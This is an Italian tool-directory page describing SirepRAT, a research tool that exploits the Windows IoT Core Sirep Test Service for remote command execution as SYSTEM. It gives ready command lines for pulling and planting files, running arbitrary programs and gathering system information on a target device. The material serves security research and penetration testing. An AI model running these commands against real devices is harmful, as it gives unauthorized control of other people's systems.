Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SirepRAT — Esecuzione remota di comandi come SYSTEM su Windows IoT Core (release disponibili per Python2.7 e Python3) | Kitploit
Strumenti/GitHubGitHub/safebreach-labs/sireprat
Sicurezza IoTExploitPost-ExploitPenetration TestingCommand and ControlStrumento di Accesso RemotoSviluppo Payload
GitHubsafebreach-labs/sireprat

SirepRAT

Esecuzione remota di comandi come SYSTEM su Windows IoT Core (release disponibili per Python2.7 e Python3)

Vedi Repository
3889135 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SirepRAT

SirepRAT - RCE come SYSTEM su Windows IoT Core

SirepRAT offre funzionalità RAT complete senza la necessità di scrivere un vero malware RAT sul target.

Contesto

Il metodo sfrutta il Sirep Test Service che è integrato e in esecuzione nelle immagini ufficiali offerte sul sito di Microsoft. Questo servizio è la parte client della configurazione HLK che si può creare per eseguire test di driver/hardware sul dispositivo IoT. Implementa il protocollo Sirep/WPCon/TShell.

Abbiamo analizzato il protocollo Sirep/WPCon e dimostrato come questo protocollo esponga un'interfaccia di comando remota per gli attaccanti, che include capacità RAT come il recupero/inserimento di file arbitrari in posizioni arbitrarie e l'ottenimento di informazioni di sistema.

Sulla base dei risultati estratti da questa ricerca sul servizio e sul protocollo, abbiamo creato un semplice strumento Python che consente di sfruttarli utilizzando i diversi comandi supportati. Lo abbiamo chiamato SirepRAT.

Offre un'interfaccia utente semplice e intuitiva per inviare comandi a un target Windows IoT Core. Funziona su qualsiasi dispositivo collegato via cavo che esegue Windows IoT Core con un'immagine ufficiale Microsoft.

Slide e White Paper

Slide e white paper della ricerca sono nella cartella docs

Installazione

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Scarica file

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

Carica file

root@kitploit:~
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

Esegui un programma arbitrario

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

Con argomenti, impersonando l'utente attualmente connesso:

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(Prova a eseguirlo senza il flag as_logged_on_user per dimostrare la capacità di esecuzione come SYSTEM)

Ottieni informazioni di sistema

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

Ottieni informazioni sul file

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

Vedi l'help per tutti i dettagli:

root@kitploit:~
python SirepRAT.py --help

Autore

Dor Azouri (@bemikre)

Contributori

movatica (@movatica) - porting a python 3! (alla fine del 2020)

Licenza

BSD 3 - licenza "New" o "Revised"

Scarica lo strumento